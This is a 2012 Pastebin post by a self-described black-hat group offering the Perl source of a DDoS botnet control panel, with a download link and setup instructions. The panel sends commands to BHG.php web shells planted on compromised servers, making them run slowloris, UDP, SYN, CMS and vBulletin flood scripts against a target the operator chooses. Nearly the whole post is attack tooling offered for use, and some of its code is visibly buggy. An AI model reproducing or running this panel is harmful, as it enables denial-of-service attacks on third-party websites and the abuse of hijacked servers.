G3n3Rall

BHG BOTNET Public Version PANEL

May 19th, 2012
641
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 12.48 KB | None | 0 0
  1. Hi Guys
  2. BHG-BOTNET-Public-Version-PANEL
  3.  
  4.  
  5.  
  6.  
  7. Download Forum Here
  8. http://g3n3rall-blackhat.persiangig.com/Pastebin/BHG-BOTNET-Public-Version-PANEL.tar.gz
  9.  
  10. support:
  11.  
  12.          1- Slowloris [Good For Apache webservers]
  13.          2- UDP ULTIMATE DDOSER
  14.          3- Multi DDOSER [WORDPRESS - JOOMLA - DRUPAL]
  15.          4- VBulletin DDOSER [ULTIMATE]
  16.          5- Syn Flooder
  17.  
  18.  
  19. Picture:
  20. http://g3n3rall-blackhat.persiangig.com/Pastebin/Screenshot%20from%202012-05-19%2020%3A39%3A21.png
  21.  
  22. Help:
  23. 1- upload BHG.php on your servers
  24. 2- put the links in to BOTS.txt    
  25. example:
  26. http://site1.com/BHG.php
  27. http://site2.com/BHG.php
  28. 3-upload ddosers [multi-ddoser.pl || slowloris.pl || syn-flooder.pl || udp-flooder-ultimate.pl ||vbulletin-ddoser.pl ]
  29. on yout servers and Set 777 Permission for all
  30. 4- Run BHG-BOTNET-PANEL.pl  and select your DDoser or Flooder And You Can also
  31. check your Bots and then Enter Target And attack :)
  32.  
  33. Private Version 100% is better than it ! :D And it's just for
  34. VIP Memebers of BLACK HAT GROUP ;)
  35. and i put panel source if you wont download from that link :
  36.  
  37. Panel Source :
  38. #!/usr/bin/perl
  39. #BHG BOTNET PANEL VERION BETA
  40. #BLACK HAT GROUP SECURITY CENTER
  41. #Code By G3n3Rall
  42. #We Are : Net.Edit0r , A.Crox , 3H34N , Am!n , tHe.K!ll3r , ArYaIeIrAn , G3n3Rall , Mr.XHat , NoL1m1t , Black Viper ,Nitrojen90 .....
  43. #www.Black-HG.Org   | Our Forum : www.Black-HG.Org/cc/
  44. #IRANIAN HACKERS
  45. ################
  46. use WWW::Mechanize;
  47. use LWP::Simple;
  48. use HTTP::Request;
  49. use LWP::UserAgent;
  50. ################
  51. system(($^O eq 'MSWin32') ? 'cls' : 'clear');   #or u can use  system("cls");  in windows and in linux system("clear");
  52. print"\n \t \t $BHG BOTNET PANEL VERSION BETA    |   G3n3Rall";
  53. print"\n \t\t  BLACK-HG.ORG    |Forum:  BLACK-HG.ORG/cc/ ";
  54. print "\n\n\n \t\t\t Choose Your DDoser :\n";
  55. print "\n\n \t\t 1- Slowloris [Good For Apache webservers]";
  56. print "\n \t\t 2- UDP ULTIMATE DDOSER";
  57. print "\n \t\t 3- Multi DDOSER [WORDPRESS - JOOMLA - DRUPAL]";
  58. print "\n \t\t 4- VBulletin DDOSER [ULTIMATE]";
  59. print "\n \t\t 5- Syn Flooder";
  60. print "\n\n \t\t 6- Exit ";
  61. print "\n\n \t Chosse ?:";
  62. #############
  63. $Menu =<STDIN>;
  64. if ($Menu==6) {exit;}
  65. chomp ($Menu);
  66. #############
  67. #Slowloris.pl
  68. if ($Menu == 1){
  69. print "\n\t\t You Choose Slowloris \n";
  70. print "\n\n\t\t PROGRESSING ....";
  71. print"\n";
  72. print"\n";
  73. sleep(3);
  74. ForCheck:;
  75. print "\n\n \t\t Do want check your BOTS ?";
  76. print "\n\n\n \t\t 1- YES";
  77. print "\n \t\t 2- NO";
  78. print "\n \t\t Check ?:";
  79. $check=<STDIN>;
  80. chomp ($check);
  81. if ($check == 2){
  82. print " \n \t \t ok ";
  83. goto Target;
  84. }
  85. if ($check == 1) {
  86. print " \n \t\t Checking .... \n";
  87. open (BTS, "<BOTS.txt") or die "\n\tSry NOT FOUND BOTS.txt \n";
  88. while (<BTS>){
  89.         $BOTS=$_;
  90.         chomp $BOTS;
  91.         syswrite STDOUT, "\t";
  92.         $request = HTTP::Request->new(GET=>$BOTS);
  93.         $useragent = LWP::UserAgent->new();
  94.         $response = $useragent->request($request);
  95.         if ($response->is_success && $response->content =~ /G3n3Rall/ || /#BHG/){
  96.         syswrite STDOUT,"\n\n \t\t  $BOTS => Success \n";
  97.        
  98.         }
  99.         else
  100.         {
  101.         syswrite STDOUT, "$BOTS => KILLED\n";
  102.         sleep(2);
  103.         exit;
  104.         }
  105.         }
  106.         goto Target;
  107. }
  108. Target:;
  109. print "\n \t LOADING ...\n ";
  110. print "\n";
  111. sleep (3);
  112. print "\t Enter Target:";
  113. $Target=<STDIN>;
  114. chomp ($Target);
  115. print "\n\t Enter Port:";
  116. $Port =<STDIN>;
  117. chomp ($Port);
  118. print "\n\t Timeout:";
  119. $Timeout = <STDIN>;
  120. $cmd = "perl slowloris.pl -dns $Target -port $Port -timeout $Timeout";
  121. $fieldname = "cmd";
  122. goto ddos;
  123. #############
  124. ddos:;
  125. open (BOTS, "<BOTS.txt") or die "\n\tSry NOT FOUND BOTS.txt \n";
  126. while (<BOTS>) {
  127. $ATTACK=$_;
  128. chomp $ATTACK;
  129. syswrite STDOUT, "\n\t Connecting ...\n";
  130. my $mechanizee = WWW::Mechanize->new(timeout => 20);
  131. $mechanizee->get($ATTACK);
  132. $mechanizee->field("$fieldname" => "$cmd");
  133. $mechanizee->click();
  134. print "\n\t################\n";
  135. syswrite STDOUT, "\t\t\t ok Started ...... \n";
  136. print "\n\t\t ALL BOTS ATTACKING TO $Target";
  137. print "\n \t\t .............................\n";
  138. print "\n \t\t .............................\n";
  139. print "\n \t\t .............................\n";
  140. }
  141. print"\n";
  142. sleep ($Timeout);
  143. print "\n\n \t\t Attack FINISHED  |  Code By G3n3Rall\n\n";
  144.  
  145. }
  146.  
  147.  
  148.  
  149. #############
  150. #ultimate-ddoser.pl
  151. if ($Menu == 2){
  152. print "\n\t\t You Choose UDP ULTIMATE DDOSER \n";
  153. print "\n\n\t\t PROGRESSING ....";
  154. print"\n";
  155. print"\n";
  156. sleep(3);
  157. ForCheck:;
  158. print "\n\n \t\t Do want check your BOTS ?";
  159. print "\n\n\n \t\t 1- YES";
  160. print "\n \t\t 2- NO";
  161. print "\n \t\t Check ?:";
  162. $check=<STDIN>;
  163. chomp ($check);
  164. if ($check == 2){
  165. print " \n \t \t ok ";
  166. goto Target2;
  167. }
  168. if ($check == 1) {
  169. print " \n \t\t Checking .... \n";
  170. open (BTS, "<BOTS.txt") or die "\n\tSry NOT FOUND BOTS.txt \n";
  171. while (<BTS>){
  172.         $BOTS=$_;
  173.         chomp $BOTS;
  174.         syswrite STDOUT, "\t";
  175.         $request = HTTP::Request->new(GET=>$BOTS);
  176.         $useragent = LWP::UserAgent->new();
  177.         $response = $useragent->request($request);
  178.         if ($response->is_success && $response->content =~ /G3n3Rall/ || /#BHG/){
  179.         syswrite STDOUT,"\n\n \t\t  $BOTS => Success \n";
  180.         goto Target2;
  181.         }
  182.         else
  183.         {
  184.         syswrite STDOUT, "$BOTS => KILLED\n";
  185.         sleep(2);
  186.         exit;
  187.         }
  188.         }
  189. }
  190. Target2:;
  191. print "\n \t LOADING ...\n ";
  192. print "\n";
  193. sleep (3);
  194. print "\t Enter Target:";
  195. $Target=<STDIN>;
  196. chomp ($Target);
  197. print "\n\t Enter Port:";
  198. $Port =<STDIN>;
  199. chomp ($Port);
  200. $cmd = "perl udp-flooder-ultimate.pl $Target $Port";
  201. $fieldname = "cmd";
  202. goto ddos2;
  203. #############
  204. ddos2:;
  205. open (BOTS, "<BOTS.txt") or die "\n\tSry NOT FOUND BOTS.txt \n";
  206. while (<BOTS>) {
  207. $ATTACK=$_;
  208. chomp $ATTACK;
  209. syswrite STDOUT, "\n\t Connecting ...\n";
  210. my $mechanizee = WWW::Mechanize->new(timeout => 20);
  211. $mechanizee->get($ATTACK);
  212. $mechanizee->field("$fieldname" => "$cmd");
  213. $mechanizee->click();
  214. print "\n\t################\n";
  215. syswrite STDOUT, "\t\t\t ok Started ...... \n";
  216. print "\n\t\t ALL BOTS ATTACKING TO $Target";
  217. print "\n \t\t .............................\n";
  218. print "\n \t\t .............................\n";
  219. print "\n \t\t .............................\n";
  220. }
  221. print"\n";
  222. sleep (999999999999999999999999999999999999999999999999999999999999999999999999999999);
  223. print "\n\n \t\t Attack FINISHED  |  Code By G3n3Rall\n\n";
  224.  
  225. }
  226. ##############
  227. #multi-ddoser.pl
  228. if ($Menu == 3){
  229. print "\n\t\t You Choose MULTI DDOSER \n";
  230. print "\n\n\t\t PROGRESSING ....";
  231. print"\n";
  232. print"\n";
  233. sleep(3);
  234. ForCheck:;
  235. print "\n\n \t\t Do want check your BOTS ?";
  236. print "\n\n\n \t\t 1- YES";
  237. print "\n \t\t 2- NO";
  238. print "\n \t\t Check ?:";
  239. $check=<STDIN>;
  240. chomp ($check);
  241. if ($check == 2){
  242. print " \n \t \t ok ";
  243. goto Target3;
  244. }
  245. if ($check == 1) {
  246. print " \n \t\t Checking .... \n";
  247. open (BTS, "<BOTS.txt") or die "\n\tSry NOT FOUND BOTS.txt \n";
  248. while (<BTS>){
  249.         $BOTS=$_;
  250.         chomp $BOTS;
  251.         syswrite STDOUT, "\t";
  252.         $request = HTTP::Request->new(GET=>$BOTS);
  253.         $useragent = LWP::UserAgent->new();
  254.         $response = $useragent->request($request);
  255.         if ($response->is_success && $response->content =~ /G3n3Rall/ || /#BHG/){
  256.         syswrite STDOUT,"\n\n \t\t  $BOTS => Success \n";
  257.         goto Target3;
  258.         }
  259.         else
  260.         {
  261.         syswrite STDOUT, "$BOTS => KILLED\n";
  262.         sleep(2);
  263.         exit;
  264.         }
  265.         }
  266. }
  267. Target3:;
  268. print "\n \t LOADING ...\n ";
  269. print "\n";
  270. sleep (3);
  271. print "\t Enter Target:";
  272. $Target=<STDIN>;
  273. chomp ($Target);
  274. print "\n\tTimeout:";
  275. $Timeout =<STDIN>;
  276. print "\n\n \t Select Options: W = WordPress |  J = Joomla  |  D = Drupal";
  277. print "Options:";
  278. $Options=<STDIN>;
  279. $cmd = "perl multi-ddoser.pl $Target $Timeout $Options";
  280. $fieldname = "cmd";
  281. goto ddos3;
  282. #############
  283. ddos3:;
  284. open (BOTS, "<BOTS.txt") or die "\n\tSry NOT FOUND BOTS.txt \n";
  285. while (<BOTS>) {
  286. $ATTACK=$_;
  287. chomp $ATTACK;
  288. syswrite STDOUT, "\n\t Connecting ...\n";
  289. my $mechanizee = WWW::Mechanize->new(timeout => 20);
  290. $mechanizee->get($ATTACK);
  291. $mechanizee->field("$fieldname" => "$cmd");
  292. $mechanizee->click();
  293. print "\n\t################\n";
  294. syswrite STDOUT, "\t\t\t ok Started ...... \n";
  295. print "\n\t\t ALL BOTS ATTACKING TO $Target";
  296. print "\n \t\t .............................\n";
  297. print "\n \t\t .............................\n";
  298. print "\n \t\t .............................\n";
  299. }
  300. print"\n";
  301. sleep ($Timeout);
  302. print "\n\n \t\t Attack FINISHED  |  Code By G3n3Rall\n\n";
  303.  
  304. }
  305. ##############
  306. #vbulletin-ddoser.pl
  307. #multi-ddoser.pl
  308. if ($Menu == 4){
  309. print "\n\t\t You Choose VBulletin DDOSER [ULTIMATE] \n";
  310. print "\n\n\t\t PROGRESSING ....";
  311. print"\n";
  312. print"\n";
  313. sleep(3);
  314. ForCheck:;
  315. print "\n\n \t\t Do want check your BOTS ?";
  316. print "\n\n\n \t\t 1- YES";
  317. print "\n \t\t 2- NO";
  318. print "\n \t\t Check ?:";
  319. $check=<STDIN>;
  320. chomp ($check);
  321. if ($check == 2){
  322. print " \n \t \t ok ";
  323. goto Target4;
  324. }
  325. if ($check == 1) {
  326. print " \n \t\t Checking .... \n";
  327. open (BTS, "<BOTS.txt") or die "\n\tSry NOT FOUND BOTS.txt \n";
  328. while (<BTS>){
  329.         $BOTS=$_;
  330.         chomp $BOTS;
  331.         syswrite STDOUT, "\t";
  332.         $request = HTTP::Request->new(GET=>$BOTS);
  333.         $useragent = LWP::UserAgent->new();
  334.         $response = $useragent->request($request);
  335.         if ($response->is_success && $response->content =~ /G3n3Rall/ || /#BHG/){
  336.         syswrite STDOUT,"\n\n \t\t  $BOTS => Success \n";
  337.         goto Target4;
  338.         }
  339.         else
  340.         {
  341.         syswrite STDOUT, "$BOTS => KILLED\n";
  342.         sleep(2);
  343.         exit;
  344.         }
  345.         }
  346. }
  347. Target4:;
  348. print "\n \t LOADING ...\n ";
  349. print "\n";
  350. sleep (3);
  351. print "\t Enter Target:";
  352. $Target=<STDIN>;
  353. chomp ($Target);
  354. print "Forum Path [ example /forum/   or  /:";
  355. $Path=<STDIN>;
  356. $cmd = "perl vbulletin-ddoser.pl $Target $Path";
  357. $fieldname = "cmd";
  358. goto ddos4;
  359. #############
  360. ddos4:;
  361. open (BOTS, "<BOTS.txt") or die "\n\tSry NOT FOUND BOTS.txt \n";
  362. while (<BOTS>) {
  363. $ATTACK=$_;
  364. chomp $ATTACK;
  365. syswrite STDOUT, "\n\t Connecting ...\n";
  366. my $mechanizee = WWW::Mechanize->new(timeout => 20);
  367. $mechanizee->get($ATTACK);
  368. $mechanizee->field("$fieldname" => "$cmd");
  369. $mechanizee->click();
  370. print "\n\t################\n";
  371. syswrite STDOUT, "\t\t\t ok Started ...... \n";
  372. print "\n\t\t ALL BOTS ATTACKING TO $Target";
  373. print "\n \t\t .............................\n";
  374. print "\n \t\t .............................\n";
  375. print "\n \t\t .............................\n";
  376. }
  377. print"\n";
  378. sleep (999999999999999999999999999999999999999999999999999999999999999999999999999999);
  379. print "\n\n \t\t Attack FINISHED  |  Code By G3n3Rall\n\n";
  380.  
  381. }
  382. ##############
  383. #syn-flooder.pl
  384. if ($Menu == 5){
  385. print "\n\t\t You Choose Syn Flooder \n";
  386. print "\n\n\t\t PROGRESSING ....";
  387. print"\n";
  388. print"\n";
  389. sleep(3);
  390. ForCheck:;
  391. print "\n\n \t\t Do want check your BOTS ?";
  392. print "\n\n\n \t\t 1- YES";
  393. print "\n \t\t 2- NO";
  394. print "\n \t\t Check ?:";
  395. $check=<STDIN>;
  396. chomp ($check);
  397. if ($check == 2){
  398. print " \n \t \t ok ";
  399. goto Target5;
  400. }
  401. if ($check == 1) {
  402. print " \n \t\t Checking .... \n";
  403. open (BTS, "<BOTS.txt") or die "\n\tSry NOT FOUND BOTS.txt \n";
  404. while (<BTS>){
  405.         $BOTS=$_;
  406.         chomp $BOTS;
  407.         syswrite STDOUT, "\t";
  408.         $request = HTTP::Request->new(GET=>$BOTS);
  409.         $useragent = LWP::UserAgent->new();
  410.         $response = $useragent->request($request);
  411.         if ($response->is_success && $response->content =~ /G3n3Rall/ || /#BHG/){
  412.         syswrite STDOUT,"\n\n \t\t  $BOTS => Success \n";
  413.         goto Target5;
  414.         }
  415.         else
  416.         {
  417.         syswrite STDOUT, "$BOTS => KILLED\n";
  418.         sleep(2);
  419.         exit;
  420.         }
  421.         }
  422. }
  423. Target5:;
  424. print "\n \t LOADING ...\n ";
  425. print "\n";
  426. sleep (3);
  427. print "\t Enter Target:";
  428. $Target=<STDIN>;
  429. chomp ($Target);
  430. print "\n\t Enter Port:";
  431. $Port =<STDIN>;
  432. chomp ($Port);
  433. print "\n\t Timeout:";
  434. $Timeout = <STDIN>;
  435. $cmd = "perl syn-flooder.pl $Target $Port $Timeout";
  436. $fieldname = "cmd";
  437. goto ddos5;
  438. #############
  439. ddos5:;
  440. open (BOTS, "<BOTS.txt") or die "\n\tSry NOT FOUND BOTS.txt \n";
  441. while (<BOTS>) {
  442. $ATTACK=$_;
  443. chomp $ATTACK;
  444. syswrite STDOUT, "\n\t Connecting ...\n";
  445. my $mechanizee = WWW::Mechanize->new(timeout => 20);
  446. $mechanizee->get($ATTACK);
  447. $mechanizee->field("$fieldname" => "$cmd");
  448. $mechanizee->click();
  449. print "\n\t################\n";
  450. syswrite STDOUT, "\t\t\t ok Started ...... \n";
  451. print "\n\t\t ALL BOTS ATTACKING TO $Target";
  452. print "\n \t\t .............................\n";
  453. print "\n \t\t .............................\n";
  454. print "\n \t\t .............................\n";
  455. }
  456. print"\n";
  457. sleep ($Timeout);
  458. print "\n\n \t\t Attack FINISHED  |  Code By G3n3Rall\n\n";
  459.  
  460. }
  461. ##############
  462. if ($Menu =! 1 || $Menu =! 2 || $Menu =! 3 || $Menu =! 4 || $Menu=! 5 || $Menu=! 6){
  463. print "\n \t\t invalid id";
  464. goto ForCheck;
  465. }
  466. system("pause");
  467. ############################################
  468. ############################################
  469.  
  470.  
  471.  
  472.  
  473.  
  474. Black Hat group Security Center
  475. Site: www.Black-hg.org
  476. Forum: www.Black-hg.org/cc/
  477. By G3n3Rall
  478.  
  479. Bye.
Advertisement
Add Comment
Please, Sign In to add comment